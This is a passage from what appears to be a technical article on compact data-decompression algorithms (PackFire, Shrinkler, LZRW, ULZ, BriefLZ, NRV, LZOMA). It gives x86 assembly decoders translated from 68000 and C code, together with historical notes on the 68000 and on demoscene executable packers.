    jnz    CopyingMatch      ; jr nz,CopyingMatch
LongMatch:        
    lodsb                    ; ld a,(hl) 
    add    al, 8             ; add 8
                             ; inc hl ; len == 9 means an extra len byte needs to be read
                             ; jr nc,CopyingMatch 
                             ; inc b
    adc    ch, ch
CopyingMatch:        
    mov    cl, al            ; ld c,a 
    inc    ecx               ; inc bc 
    pop    eax               ; exa 
    cmp    al, 20h           ; token == #20 suggests a possibility of the end marker (#20,#00)
    jnz    NotTheEnd         ; jr nz,NotTheEnd 
    xor    al, al            ; xor a 
    cmp    [esi], al         ; cp (hl) 
    jz     exit              ; ret z   ; is it the end marker? return if it is
NotTheEnd:
    and    al, 1fh           ; and %00011111 ; A' = high(offset); also, reset flag C for SBC below
    push   esi               ; push hl 
    movzx  edx, byte[esi]    ; ld l,(hl)  
    mov    dh, al            ; ld h,a                ; HL = offset
    movsx  edx, dx           ; 
                             ; push de
    mov    esi, edi          ; ex de,hl              ; DE = offset, HL = dest
    sbb    esi, edx          ; sbc hl,de             ; HL = dest-offset
                             ; pop de
    rep    movsb             ; ldir
    pop    esi               ; pop hl 
    inc    esi               ; inc hl
MainLoop:        
    mov    al, [esi]         ; ld a,(hl) 
    cmp    al, 20h           ; cp #20  
    jnc    ProcessMatches    ; jr nc,ProcessMatches  ; tokens "000lllll" mean "copy lllll+1 literals"
    inc    al                ; inc a 
    mov    cl, al            ; ld c,a 
    inc    esi               ; inc hl 
    rep    movsb             ; ldir   ; actual copying of the literals
    jmp    MainLoop          ; jr MainLoop
exit:
    sub    edi, [esp+32+4]
    mov    [esp+28], edi
    popad
    ret

11. Motorola 68000 (68K)

“Motorola, with its superior technology, lost the single most important design contest of the last 50 years” Walden C. Rhines

A revolutionary CPU released in 1979 that includes eight 32-Bit general-purpose data registers (D0-D7), and eight address registers (A0-A7) used for function arguments and stack pointer. The 68K was used in the Commodore Amiga, the Atari ST, the Macintosh, including various fourth-generation gaming consoles like the Sega Megadrive, and arcade systems like Namco System 2. The 68K was more compelling than the Z80, 6502, 8088, and 8086, so why did it lose to Intel in the home computer war of the 1980s? A history of the Amiga, part 10: The downfall of Commodore offers some plausible answers. IBM choosing Control Program/Monitor by Gary Kildall for its 1980 PC operating system is also likely a factor.

The following table lists some 68K instructions and the x86 instructions used to replace them.

68K x86 Description
move mov Copy data from source to destination
add add Add binary.
addx adc Add with borrow/carry.
sub sub Subtract binary.
subx sbb Subtract with borrow/carry.
rts ret Return from subroutine.
dbf/dbt loopne/loope Test condition, decrement, and branch.
bsr call Branch to subroutine
bcs:bcc jc:jnc Branch/Jump if carry set. Jump if carry clear.
beq:bne je:jne Branch/Jump if equal. Not equal.
ble jle Branch/Jump if less than or equal.
bra jmp Branch always.
lsr shr Logical shift right.
lsl shl Logical shift left.
bhs jae Branch on higher than or same.
bpl jns Branch on higher than or same.
bmi js Branch on minus. Jump if signed.
tst test Test bit zero of a register.
exg xchg Exchange registers.

11.1 PackFire

Designed by neural and published in 2010, PackFire comprises two algorithms tailored for demos targeting the Atari ST. The first borrows ideas from Exomizer and is suitable for small files not exceeding ~40KB. The other borrows ideas from LZMA, which is more suited to compressing larger files. The LZMA-variant requires 16KB of RAM for the range decoder, which isn’t a problem for the Atari ST with between 512-1024KB of RAM available. However, translating code written for the 68K to x86 isn’t easy because the x86 is a less advanced architecture. Since being released, badc0de has published decoders for a variety of other architectures, including 32-Bit ARM. The following is the Exomizer-style decoder for files not exceeding ~40KB, which probably isn’t very useful unless you write demos for retro hardware.

packfire_depack:    
_packfire_depack:    
    pushad
    
    mov    ebp, [esp+32+4]   ; eax = inbuf (a0)
    mov    edi, [esp+32+8]   ; edi = outbuf (a1)
    
    lea    esi, [ebp+26]     ; lea     26(a0),a2
    lodsb                    ; move.b  (a2)+,d7
lit_copy:               
    movsb                    ; move.b  (a2)+,(a1)+
main_loop:              
    call   get_bit           ; bsr.b   get_bit
    jc     lit_copy          ; bcs.b   lit_copy
    
    cdq                      ; moveq   #-1,d3
    dec    edx
get_index:              
    inc    edx               ; addq.l  #1,d3
    call   get_bit           ; bsr.b   get_bit
    jnc    get_index         ; bcc.b   get_index
    
    cmp    edx, 0x10         ; cmp.w   #$10,d3
    je     depack_stop       ; beq.b   depack_stop
    
    call   get_pair          ; bsr.b   get_pair
    push   edx               ; move.w  d3,d6 ; save it for the copy
    cmp    edx, 2            ; cmp.w   #2,d3
    jle    out_of_range      ; ble.b   out_of_range
    
    cdq                      ; moveq   #0,d3
out_of_range:
                             ; move.b  table_len(pc,d3.w),d1
                             ; move.b  table_dist(pc,d3.w),d0
    ; code without tables
    push   4                 ; d1 = 4
    pop    ecx
    push   16                ; d0 = 16
    pop    ebx
    dec    edx               ; d3--
    js     L0
    
    dec    edx
    mov    cl, 2             ; d1 = 2
    mov    bl, 48            ; d0 = 48
    js     L0
    
    mov    cl, 4             ; d1 = 4
    mov    bl, 32            ; d0 = 32
L0:
    call   get_bits          ; bsr.b   get_bits
    call   get_pair          ; bsr.b   get_pair
    pop    ecx
    push   esi
    mov    esi, edi          ; move.l  a1,a3
    sub    esi, edx          ; sub.l   d3,a3
copy_bytes:             
    rep    movsb             ; move.b  (a3)+,(a1)+
                             ; subq.w  #1,d6
                             ; bne.b   copy_bytes
    pop    esi
    jmp    main_loop         ; bra.b   main_loop
get_pair:
    pushad
    cdq                      ; sub.l   a6,a6
                             ; moveq   #$f,d2
calc_len_dist:          
    mov    ebx, edx          ; move.w  a6,d0
    and    ebx, 15           ; and.w   d2,d0
    jne    node              ; bne.b   node
    push   1
    pop    edi               ; moveq   #1,d5
node:                   
    mov    eax, edx          ; move.w  a6,d4
    shr    eax, 1            ; lsr.w   #1,d4    
    mov    cl, [ebp+eax]     ; move.b  (a0,d4.w),d1
    push   1                 ; moveq   #1,d4
    pop    eax
    and    ebx, eax          ; and.w   d4,d0
    je     nibble            ; beq.b   nibble
    shr    ecx, 4            ; lsr.b   #4,d1
nibble:                 
    mov    ebx, edi          ; move.w  d5,d0
    and    ecx, 15           ; and.w   d2,d1
    shl    eax, cl           ; lsl.l   d1,d4
    add    edi, eax          ; add.l   d4,d5
    inc    edx               ; addq.w  #1,a6

    ; dbf  d3,calc_len_dist
    dec    dword[esp+pushad_t.edx] 
    jns    calc_len_dist
    ; save d0 and d1
    mov    [esp+pushad_t.ebx], ebx
    mov    [esp+pushad_t.ecx], ecx
    popad
get_bits:               
    cdq                      ; moveq   #0,d3
getting_bits:           
    dec    ecx               ; subq.b  #1,d1
    jns    cont_get_bit      ; bhs.b   cont_get_bit
    add    edx, ebx          ; add.w   d0,d3
    ret
depack_stop:
    sub    edi, [esp+32+8]   ; 
    mov    [esp+pushad_t.eax], edi
    popad
    ret                      ; rts
cont_get_bit:           
    call   get_bit           ; bsr.b   get_bit
    adc    edx, edx          ; addx.l  d3,d3
    jmp    getting_bits      ; bra.b   getting_bits
get_bit:                
    add    al, al            ; add.b   d7,d7
    jne    byte_done         ; bne.b   byte_done
    lodsb                    ; move.b  (a2)+,d7
    adc    al, al            ; addx.b  d7,d7
byte_done:              
    ret                      ; rts

11.2 Shrinkler

Designed by Aske Simon Christensen (Blueberry/Loonies) and published in 1999. It stores compressed data in Big-Endian 32-bit words, and the x86 translation must use BSWAP before reading bits of the stream. The compressor is open source and could be updated to use Little-Endian format instead. Christensen is also a co-author of the Crinkler executable compressor along with Rune Stubbe (Mentor/TBC) that’s popular for 4K intros on Windows.

The following is a description from Blueberry:

Shrinkler is optimized for target sizes around 4k (while still being good for 64k), which strongly favors decompression code size. It tries to achieve the best size for this target, somewhat at the expense of decompression speed. At the same time, it is intended to be useful on Amiga 500, which means that decompression speed should still be reasonable, and decompression memory usage should be small. Shrinkler decrunches a 64k intro in typically less than half a minute on Amiga 500, which is an acceptable wait time for starting an intro. And the memory needed for the probabilities fits within the default stack size of 4k on Amiga.

Shrinkler also has special tweaks gearing it towards 16-bit oriented data (as all 68000 instructions are a multiple of 16 bits). Specifically, it keeps separate literal context groups for even and odd bytes, since these distributions are usually very different for Amiga data. Same thing for the flag indicating whether the a literal or a match is coming up. This gives a great boost for Amiga intros, but it has no benefit for data that has arbitrary alignment. It usually doesn’t hurt either, except for the slight cost in decompression code size.

The following is a translation of the 68K assembly to x86, with help from Blueberry.

    %define INIT_ONE_PROB       0x8000
    %define ADJUST_SHIFT        4
    %define SINGLE_BIT_CONTEXTS 1
    %define NUM_CONTEXTS        1536

    struc pushad_t
      .edi resd 1
      .esi resd 1    
      .ebp resd 1    
      .esp resd 1     
      .ebx resd 1
      .edx resd 1
      .ecx resd 1
      .eax resd 1
    endstruc
    
    ; temporary variables for range decoder
    %define d2   4*0
    %define d3   4*1
    %define d4   4*2
    %define prob 4*3
    
    %ifndef BIN
      global ShrinklerDecompress
      global _ShrinklerDecompress
    %endif
    
ShrinklerDecompress:
_ShrinklerDecompress:
    ; save d2-d7/a4-a6 in -(a7) the stack
    pushad                   ; movem.l  d2-d7/a4-a6,-(a7)

    ; esi = inbuf    
    mov    esi, [esp+32+4]   ; move.l a0,a4
    ; edi = outbuf
    mov    edi, [esp+32+8]   ; move.l a1,a5
                             ; move.l a1,a6
    ; allocate local memory for range decoder
    sub    esp, 4096
    test   [esp], esp        ; stack probe
    mov    ebp, esp          ; ebp = stack pointer
    
    ; Init range decoder state
    mov    dword[ebp+d2], 0  ; moveq.l  #0,d2
    mov    dword[ebp+d3], 1  ; moveq.l  #1,d3
    mov    dword[ebp+d4], 1  ; moveq.l  #1,d4
    ror    dword[ebp+d4], 1  ; ror.l  #1,d4

    ; Init probabilities
    mov    edx, NUM_CONTEXTS ; move.l #NUM_CONTEXTS, d6
.init:  
    ; move.w  #INIT_ONE_PROB,-(a7)
    mov    word[prob+ebp+edx*2-2], INIT_ONE_PROB  
    sub    dx, 1             ; subq.w #1,d6                        
    jne    .init             ; bne.b  .init
    ; D6 = 0
.lit:
    ; Literal
    add    dl, 1             ; addq.b #1,d6
.getlit:
    call   GetBit            ; bsr.b  GetBit
    adc    dl, dl            ; addx.b d6,d6
    jnc    .getlit           ; bcc.b  .getlit
  
    mov    [edi], dl         ; move.b d6,(a5)+
    inc    edi
                             ; bsr.b  ReportProgress
.switch:
    ; After literal
    call   GetKind           ; bsr.b  GetKind
    jnc    .lit              ; bcc.b  .lit
    ; Reference
    mov    edx, -1           ; moveq.l  #-1,d6
    call   GetBit            ; bsr.b  GetBit
    jnc    .readoffset       ; bcc.b  .readoffset
.readlength:
    mov    edx, 4            ; moveq.l  #4,d6
    call   GetNumber         ; bsr.b  GetNumber
.copyloop:
    mov    al, [edi + ebx]   ; move.b (a5,d5.l),(a5)+
    stosb
    sub    ecx, 1            ; subq.l #1,d7
    jne    .copyloop         ; bne.b  .copyloop
                             ; bsr.b  ReportProgress
    ; After reference
    call   GetKind           ; bsr.b  GetKind
    jnc    .lit              ; bcc.b  .lit
.readoffset:
    mov    edx, 3            ; moveq.l  #3,d6
    call   GetNumber         ; bsr.b  GetNumber
    mov    ebx, 2            ; moveq.l  #2,d5
    sub    ebx, ecx          ; sub.l  d7,d5
    jne    .readlength       ; bne.b  .readlength

    add    esp, 4096         ; lea.l  NUM_CONTEXTS*2(a7),a7
    sub    edi, [esp+32+8]
    mov    [esp+pushad_t.eax], edi
    popad                    ; movem.l  (a7)+,d2-d7/a4-a6
    ret                      ; rts

ReportProgress:
    ; move.l  a2,d0
    ; beq.b .nocallback
    ; move.l  a5,d0
    ; sub.l a6,d0
    ; move.l  a3,a0
    ; jsr (a2)
.nocallback:
    ; rts

GetKind:
    ; Use parity as context
                             ; move.l a5,d1
    mov    edx, 1            ; moveq.l  #1,d6
    and    edx, edi          ; and.l  d1,d6
    shl    dx, 8             ; lsl.w  #8,d6
    jmp    GetBit            ; bra.b  GetBit

GetNumber:
    ; EDX = Number context
    ; Out: Number in ECX
    shl    dx, 8             ; lsl.w  #8,d6
.numberloop:
    add    dl, 2             ; addq.b #2,d6
    call   GetBit            ; bsr.b  GetBit
    jc     .numberloop       ; bcs.b  .numberloop
    mov    ecx, 1            ; moveq.l  #1,d7
    sub    dl, 1             ; subq.b #1,d6
.bitsloop:
    call   GetBit            ; bsr.b  GetBit
    adc    ecx, ecx          ; addx.l d7,d7
    sub    dl, 2             ; subq.b #2,d6
    jnc    .bitsloop         ; bcc.b  .bitsloop
    ret                      ; rts

    ; EDX = Bit context

    ; d2 = Range value
    ; d3 = Interval size
    ; d4 = Input bit buffer

    ; Out: Bit in C and X
readbit:
    mov    eax, [ebp+d4]
    add    eax, eax          ; add.l  d4,d4
    jne    nonewword         ; bne.b  nonewword
    lodsd                    ; move.l (a4)+,d4
    bswap  eax               ; data is stored in big-endian format
    adc    eax, eax          ; addx.l d4,d4
nonewword:
    mov    [ebp+d4], eax 
    mov    [esp+pushad_t.esi], esi
    adc    bx, bx            ; addx.w d2,d2
    add    cx, cx            ; add.w  d3,d3
    jmp    check_interval
GetBit:
    pushad
    mov    ebx, [ebp+d2]
    mov    ecx, [ebp+d3]
check_interval:
    test   cx, cx            ; tst.w  d3
    jns    readbit           ; bpl.b  readbit

    ; lea.l 4+SINGLE_BIT_CONTEXTS*2(a7,d6.l),a1
    ; add.l d6,a1
    lea    edi, [ebp+prob+2*edx+SINGLE_BIT_CONTEXTS*2]      
    movzx  eax, word[edi]    ; move.w (a1),d1
    ; D1/EAX = One prob

    shr    ax, ADJUST_SHIFT  ; lsr.w  #ADJUST_SHIFT,d1
    sub    [edi], ax         ; sub.w  d1,(a1)
    add    ax, [edi]         ; add.w  (a1),d1
    
    mul    cx                ; mulu.w d3,d1
                             ; swap.w d1

    sub    bx, dx            ; sub.w  d1,d2
    jb     .one              ; blo.b  .one
.zero:
    ; oneprob = oneprob * (1 - adjust) = oneprob - oneprob * adjust
    sub    cx, dx            ; sub.w  d1,d3
    ; 0 in C and X
                             ; rts
    jmp    exit_get_bit
.one:
    ; onebrob = 1 - (1 - oneprob) * (1 - adjust) = oneprob - oneprob * adjust + adjust
    ; add.w #$ffff>>ADJUST_SHIFT,(a1)
    add    word[edi], 0xFFFF >> ADJUST_SHIFT 
    mov    cx, dx            ; move.w d1,d3
    add    bx, dx            ; add.w  d1,d2
    ; 1 in C and X
exit_get_bit:
    mov    word[ebp+d2], bx
    mov    word[ebp+d3], cx
    popad
    ret                      ; rts

The following is my own attempt to implement a size-optimized version of the same depacker in x86 assembly. However, there’s likely room for improvement here, and this code will be updated later.

    %define INIT_ONE_PROB       0x8000
    %define ADJUST_SHIFT        4
    %define SINGLE_BIT_CONTEXTS 1
    %define NUM_CONTEXTS        1536

    struc pushad_t
      .edi resd 1
      .esi resd 1
      .ebp resd 1
      .esp resd 1
      .ebx resd 1
      .edx resd 1
      .ecx resd 1
      .eax resd 1
    endstruc

    struc shrinkler_ctx
      .esp      resd 1      ; original value of esp before allocation
      .range    resd 1      ; range value
      .ofs      resd 1
      .interval resd 1      ; interval size
    endstruc

    bits 32

    %ifndef BIN
      global shrinkler_depackx
      global _shrinkler_depackx
    %endif

shrinkler_depackx:
_shrinkler_depackx:
    pushad
    mov    ebx, [esp+32+4]   ; edi = outbuf
    mov    esi, [esp+32+8]   ; esi = inbuf

    mov    eax, esp
    xor    ecx, ecx          ; ecx = 4096
    mov    ch, 10h
    sub    esp, ecx          ; subtract 1 page
    test   [esp], esp        ; stack probe

    mov    edi, esp
    stosd                    ; save original value of esp
    cdq
    xchg   eax, edx
    stosd                    ; range value = 0
    stosd                    ; offset = 0
    inc    eax
    stosd                    ; interval length = 1

    call   init_get_bit
GetBit:
    pushad
    mov    ebp, [ebx+shrinkler_ctx.range   ]
    mov    ecx, [ebx+shrinkler_ctx.interval]
    jmp    check_interval
readbit:
    add    al, al
    jne    nonewword
    lodsb
    adc    al, al
nonewword:
    mov    [esp+pushad_t.eax], eax
    mov    [esp+pushad_t.esi], esi
    adc    ebp, ebp
    add    ecx, ecx
check_interval:
    test   cx, cx
    jns    readbit

    lea    edi, [shrinkler_ctx_size + ebx + 2*edx + SINGLE_BIT_CONTEXTS*2]
    mov    ax, word[edi]

    shr    eax, ADJUST_SHIFT
    sub    [edi], ax
    add    ax, [edi]

    cdq
    mul    cx

    sub    ebp, edx
    jc    .one
.zero:
    ; oneprob = oneprob * (1 - adjust) = oneprob - oneprob * adjust
    sub    ecx, edx
    ; 0 in C and X
    jmp    exit_getbit
.one:
    ; onebrob = 1 - (1 - oneprob) * (1 - adjust) = oneprob - oneprob * adjust + adjust
    add    word[edi], (0xFFFF >> ADJUST_SHIFT)
    xchg   edx, ecx
    add    ebp, ecx
    ; 1 in C and X
exit_getbit:
    mov    [ebx+shrinkler_ctx.range   ], ebp
    mov    [ebx+shrinkler_ctx.interval], ecx
    popad
    ret
GetKind:
    ; Use parity as context
    mov    edx, edi
    and    edx, 1
    shl    edx, 8
    jmp    ebp
GetNumber:
    cdq
    adc    dh, 3
.numberloop:
    inc    edx
    inc    edx
    call   ebp
    jc    .numberloop
    push   1
    pop    ecx
    dec    edx
.bitsloop:
    call   ebp
    adc    ecx, ecx
    sub    dl, 2
    jnc   .bitsloop
    ret

init_get_bit:
    pop    ebp               ; ebp = GetBit

    ; Init probabilities
    mov    ch, NUM_CONTEXTS >> 8
    xor    eax, eax
    mov    ah, 1<<7
    rep    stosw
    xchg   al, ah

    mov    edi, ebx
    mov    ebx, esp

    ; edx = 0
    cdq
.lit:
    ; Literal
    inc    edx
.getlit:
    call   ebp
    adc    dl, dl
    jnc    .getlit

    mov    [edi], dl
    inc    edi
.switch:
    ; After literal
    call   GetKind
    jnc    .lit

    ; Reference
    cdq
    dec    edx
    call   ebp
    jnc    .readoffset
.readlength:
    clc
    call   GetNumber
    push   esi
    mov    esi, edi
    add    esi, dword[ebx+shrinkler_ctx.ofs]
    rep    movsb
    pop    esi

    ; After reference
    call   GetKind
    jnc   .lit
.readoffset:
    stc
    call   GetNumber
    neg    ecx
    inc    ecx
    inc    ecx
    mov    [ebx+shrinkler_ctx.ofs], ecx
    jne   .readlength

    ; return depacked length
    mov    esp, [ebx+shrinkler_ctx.esp]
    sub    edi, [esp+32+4]
    mov    [esp+pushad_t.eax], edi
    popad
    ret

12. C/x86 assembly

The following algorithms were translated from C to x86 assembly or were already implemented in x86 assembly and optimized for size.

12.1 Lempel-Ziv Ross Williams (LZRW)

Designed by Ross Williams and described in An Extremely Fast Ziv-Lempel Data Compression Algorithm published in 1991. The compression ratio is only slightly worse than LZ77 but is much faster at compression.

lzrw1_depack:
_lzrw1_depack:
    pushad
    lea    esi, [esp+32+4]
    lodsd
    xchg   edi, eax        ; edi = outbuf
    lodsd
    xchg   ebp, eax        ; ebp = inlen
    lodsd
    xchg   esi, eax        ; esi = inbuf
    add    ebp, esi        ; ebp = inbuf + inlen
L0:
    push   16 + 1          ; bits = 16
    pop    edx
    lodsw                  ; ctrl = *in++, ctrl |= (*in++) << 8
    xchg   ebx, eax        
L1:
    ; while(in != end) {
    cmp    esi, ebp
    je     L4
    ; if(--bits == 0) goto L0
    dec    edx
    jz     L0
L2:
    ; if(ctrl & 1) {
    shr    ebx, 1
    jc     L3
    movsb                  ; *out++ = *in++;
    jmp    L1
L3:
    lodsb                  ; ofs = (*in & 0xF0) << 4
    aam    16
    cwde
    movzx  ecx, al
    inc    ecx
    lodsb                  ; ofs |= *in++ & 0xFF;
    push   esi             ; save pointer to in
    mov    esi, edi        ; ptr  = out - ofs;
    sub    esi, eax
    rep    movsb           ; while(len--) *out++ = *ptr++;
    pop    esi             ; restore pointer to in
    jmp    L1
L4:
    sub    edi, [esp+32+4] ; edi = out - outbuf
    mov    [esp+28], edi   ; esp+_eax = edi
    popad
    ret

12.2 Ultra-fast LZ (ULZ)

Ultra-fast LZ was first published by Ilya “encode” Muravyov in 2010 and then appears to have been open sourced in 2019. The following code is a straightforward translation of the C decoder to x86 assembly.

static uint32_t add_mod(uint32_t x, uint8_t** p);

uint32_t ulz_depack(
  void *outbuf,
  uint32_t inlen,
  const void *inbuf) 
{
    uint8_t  *ptr, *in, *end, *out;
    uint32_t dist, len;
    uint8_t  token;

    out = (uint8_t*)outbuf;
    in  = (uint8_t*)inbuf;
    end = in + inlen;
    
    while(in < end) {
      token = *in++;
      if(token >= 32) {
        len = token >> 5;
        if(len == 7) 
          len = add_mod(len, &in);
        while(len--) *out++ = *in++;
        if(in >= end) break;
      }
      len = (token & 15) + 4;
      if(len == (15 + 4)) 
        len = add_mod(len, &in);
      dist = ((token & 16) << 12) + *(uint16_t*)in;
      in += 2;
      ptr = out - dist;
      while(len--) *out++ = *ptr++;
    }
    return (uint32_t)(out - (uint8_t*)outbuf);
}

static uint32_t add_mod(uint32_t x, uint8_t** p) {
    uint8_t c, i;
    
    for(i=0; i<=21; i+=7) {
      c = *(*p)++;
      x += (c << i);
      if(c < 128) break;
    }
    return x;
}
ulz_depack:
_ulz_depack:
    pushad
    lea    esi, [esp+32+4]
    lodsd
    xchg   edi, eax          ; edi = outbuf
    lodsd
    xchg   ebx, eax
    lodsd
    xchg   esi, eax          ; esi = inbuf
    add    ebx, esi          ; ebx += inbuf
ulz_main:
    xor    ecx, ecx
    mul    ecx
    ; while (in < end) {
    cmp    esi, ebx
    jnb    ulz_exit
    ; token = *in++;
    lodsb
    ; if(token >= 32) {
    cmp    al, 32
    jb     ulz_copy2
    ; len = token >> 5
    mov    cl, al
    shr    cl, 5
    ; if(len == 7)
    cmp    cl, 7
    jne    ulz_copy1
    ; len = add_mod(len, &in);
    call   add_mod
ulz_copy1:
    ; while(len--) *out++ = *in++;
    rep    movsb
    ; if(in >= end) break;
    cmp    esi, ebx
    jae    ulz_exit
ulz_copy2:
    ; len = (token & 15) + 4;
    mov    cl, al
    and    cl, 15
    add    cl, 4
    ; if(len == (15 + 4))
    cmp    cl, 15 + 4
    jne    ulz_copy3
    ; len = add_mod(len, &in);
    call   add_mod
ulz_copy3:
    ; dist = ((token & 16) << 12) + *(uint16_t*)in;
    and    al, 16
    shl    eax, 12
    xchg   eax, edx
    ; eax = *(uint16_t*)in;
    ; in += 2;
    lodsw
    add    edx, eax
    ; p = out - dist
    push   esi
    mov    esi, edi
    sub    esi, edx
    ; while(len--) *out++ = *p++;
    rep    movsb
    pop    esi
    jmp    ulz_main
    ; }
ulz_exit:
    ; return (uint32_t)(out - (uint8_t*)outbuf);
    sub    edi, [esp+32+8]
    mov    [esp+28], edi
    popad
    ret
    
; static uint32_t add_mod(uint32_t x, uint8_t** p);
add_mod:
    push   eax               ; save eax
    xchg   eax, ecx          ; eax = len
    xor    ecx, ecx          ; i = 0
am_loop:
    mov    dl, byte[esi]     ; c = *(*p)++
    inc    esi
    push   edx               ; save c
    shl    edx, cl           ; x += (c << i)
    add    eax, edx
    pop    edx               ; restore c
    cmp    dl, 128           ; if(c < 128) break;
    jb     am_exit
    add    cl, 7             ; i+=7
    cmp    cl, 21            ; i<=21
    jbe    am_loop
am_exit:
    xchg   eax, ecx          ; ecx = len
    pop    eax               ; restore eax
    ret

12.3 BriefLZ

Designed by Jørgen Ibsen and published in 2015. BriefLZ combines fast encoding and decoding with a good compression ratio. Ibsen uses 16-Bit tags instead of 8-Bit to improve performance on 16-bit architectures. It encodes the match reference length and offset using Elias gamma coding. The following size-optimized decoder in x86 assembly is only 92 bytes.

blz_depack:
_blz_depack:
    pushad
    lea    esi, [esp+32+4]   ; 
    lodsd
    xchg   edi, eax          ; bs.dst = outbuf
    lodsd
    lea    ebx, [edi+eax]    ; end = bs.dst + outlen
    lodsd
    xchg   esi, eax          ; bs.src = inbuf
    call   blz_init_getbit
blz_getbit:
    add    ax, ax            ; tag <<= 1 
    jnz    blz_exit_getbit   ; continue for all bits
    lodsw                    ; read 16-bit tag
    adc    ax, ax            ; carry over previous bit
blz_exit_getbit:
    ret
blz_init_getbit:
    pop    ebp               ; ebp = blz_getbit
    mov    ax, 8000h         ; 
blz_literal:
    movsb                    ; *out++ = *bs.src++
blz_main:
    cmp    edi, ebx          ; while(out < end)
    jnb    blz_exit
    
    call   ebp               ; cf = blz_getbit
    jnc    blz_literal       ; if(cf==0) goto blz_literal
                             ; 
blz_getgamma:
    pushfd                   ; save cf
    cdq                      ; result = 1
    inc    edx
blz_gamma_loop:
    call   ebp               ; cf = blz_getbit()
    adc    edx, edx          ; result = (result << 1) + cf
    call   ebp               ; cf = blz_getbit()
    jc     blz_gamma_loop    ; while(cf == 1)
    
    popfd                    ; restore cf
    cmovc  ecx, edx          ; ecx = cf ? edx : ecx
    cmc                      ; complement carry
    jnc    blz_getgamma      ; loop twice
    
    ; ofs = blz_getgamma(&bs) - 2;
    dec    edx
    dec    edx
    
    ; len = blz_getgamma(&bs) + 2;
    inc    ecx
    inc    ecx
    
    ; ofs = (ofs << 8) + (uint32_t)*bs.src++ + 1;
    shl    edx, 8
    mov    dl, [esi]
    inc    esi
    inc    edx
    
    ; ptr = out - ofs;
    push   esi
    mov    esi, edi
    sub    esi, edx
    rep    movsb
    pop    esi
    jmp    blz_main
blz_exit:
    ; return (out - (uint8_t*)outbuf);
    sub    edi, [esp+32+4]
    mov    [esp+28], edi
    popad
    ret

12.4 Not Really Vanished (NRV)

Designed by Markus F.X.J. Oberhumer and used in the famous Ultimate Packer for eXecutables (UPX). NRV uses an LZ77 format with Elias gamma coding for the reference match offset and length. The following x86 assembly derived from n2b_d_s1.asm in the UCL library is currently 115 bytes.

nrv2b_depack:
_nrv2b_depack:
    pushad
    mov    edi, [esp+32+4]   ; output
    mov    esi, [esp+32+8]   ; input
    
    xor    ecx, ecx
    mul    ecx
    dec    edx
    mov    al, 0x80
    
    call   init_get_bit
    ; read next bit from input
    add    al, al
    jnz    exit_get_bit
    
    lodsb
    adc    al, al
exit_get_bit:             
    ret
init_get_bit:
    pop    ebp
    jmp    nrv2b_main
    ; copy literal
nrv2b_copy_byte:
    movsb
nrv2b_main:
    call   ebp
    jc     nrv2b_copy_byte
    
    push   1
    pop    ebx
nrv2b_match:
    call   ebp
    adc    ebx, ebx
    
    call   ebp
    jnc    nrv2b_match
    
    sub    ebx, 3
    jb     nrv2b_offset
    
    shl    ebx, 8
    mov    bl, [esi]
    inc    esi
    xor    ebx, -1
    jz     nrv2b_exit
    
    xchg   edx, ebx
nrv2b_offset:
    call   ebp
    adc    ecx, ecx
    
    call   ebp
    adc    ecx, ecx
    jnz    nrv2b_copy_bytes
    
    inc    ecx
nrv2b_len:
    call   ebp
    adc    ecx, ecx
    
    call   ebp
    jnc    nrv2b_len
    
    inc    ecx
    inc    ecx
nrv2b_copy_bytes:
    cmp    edx, -0xD00
    adc    ecx, 1
    push   esi
    lea    esi, [edi + edx]
    rep    movsb
    pop    esi
    jmp    nrv2b_main
nrv2b_exit:
    ; return depacked length
    sub    edi, [esp+32+4]
    mov    [esp+28], edi
    popad
    ret

12.5 Lempel-Ziv-Markov chain Algorithm (LZMA)

Designed by Igor Pavlov and published in 1998 with the 7zip archiver. It’s an LZ77 variant with features similar to LZX used for Microsoft CAB files and compressed help (CHM) files. LZMA uses an arithmetic coder to store compressed data as a stream of bits resulting in high compression ratios that inspired the development of Packfire, KKrunchy, and LZOMA, to name a few. There’s a description by Charles Bloom in De-obfuscating LZMA and by Matt Mahoney in Data Compression Explained. Alex Ionescu has also published a minimal implementation with very detailed and helpful comments included in the source. Another size-optimized version is available from the UPX LZMA SDK. The arithmetic coder for LZMA usually requires 16KB of RAM and may not be suitable for devices with limited resources. mudlord’s Win32 executable packer called mupack has an x86 implementation.

Although the compression ratio is excellent, and the speed is acceptable for small files. The complexity of the decompressor for only a few additional percents more in the compression ratio didn’t merit an implementation in x86 assembly. I’d be willing to implement it on a better architecture like ARM64, but not x86. Shrinkler, KKrunchy, and LZOMA all offer ~55% ratios with much smaller RAM and ROM requirements that seem more suitable for executable compression.

12.6 Lempel–Ziv–Oberhumer-Markov Algorithm (LZOMA)

Designed by Alexandr Efimov and published in 2015. LZOMA is specifically for decompression of the Linux Kernel but is also suitable for decompression of PE or ELF files too. It’s primarily based on ideas used by LZMA and LZO. It provides fast decompression like LZO, and a simplified LZMA format provides a high compression ratio. The trade-off is slow compression requiring a lot of memory. It’s possible to improve the compression ratio by using a real entropy encoder, but at the expense of decompression speed. While it’s still only an experimental algorithm and probably needs more testing, the following is a decoder in C and handwritten x86 assembly.

typedef struct _lzoma_ctx {
    uint32_t w;
    uint8_t  *src;
} lzoma_ctx;

static uint8_t get_bit(lzoma_ctx *c) {
    uint32_t cy, x;
    
    x = c->w;
    c->w <<= 1;

    // no bits left?
    if(c->w == 0) {
      // read 32-bit word
      x = *(uint32_t*)c->src;
      // advance input
      c->src += 4;
      // double with carry
      c->w = (x << 1) | 1;
    }
    // return carry bit
    return (x >> 31);
}
 
void lzoma_depack(
  void *outbuf, 
  uint32_t inlen, 
  const void *inbuf) 
{
    uint8_t   *out, *ptr, *end;
    uint32_t  cf, top, total, len, ofs, x, res;
    lzoma_ctx c;

    c.w    = 1 << 31;
    c.src  = (uint8_t*)inbuf;
    out    = (uint8_t*)outbuf;
    end    = out + inlen;
    
    // copy first byte
    *out++ = *c.src++;
    len    = 0;
    ofs    = -1;

    while(out < end) {
      for(;;) {
        // if bit carried, break
        if(cf = get_bit(&c)) break;
        // copy byte
        *out++ = *c.src++;
        len = 2;
      }
      // unpack lz
      if(len) {
        cf = get_bit(&c);
      }
      // carry?
      if(cf) {
        len   = 3;
        total = out - (uint8_t*)outbuf;        
        top   = ((total <= 400000) ? 60 : 50); 
        ofs   = 0;                             
        x     = 256;                           
        res   = *c.src++;                      
        
        for(;;) {
          x += x;
          if(x >= (total + top)) {
            x -= total;
            if(res >= x) { 
              cf = get_bit(&c);
              res = (res << 1) + cf;
              res -= x;
            }
            break;
          }      
          // magic?
          if(x & (0x002FFE00 << 1)) {
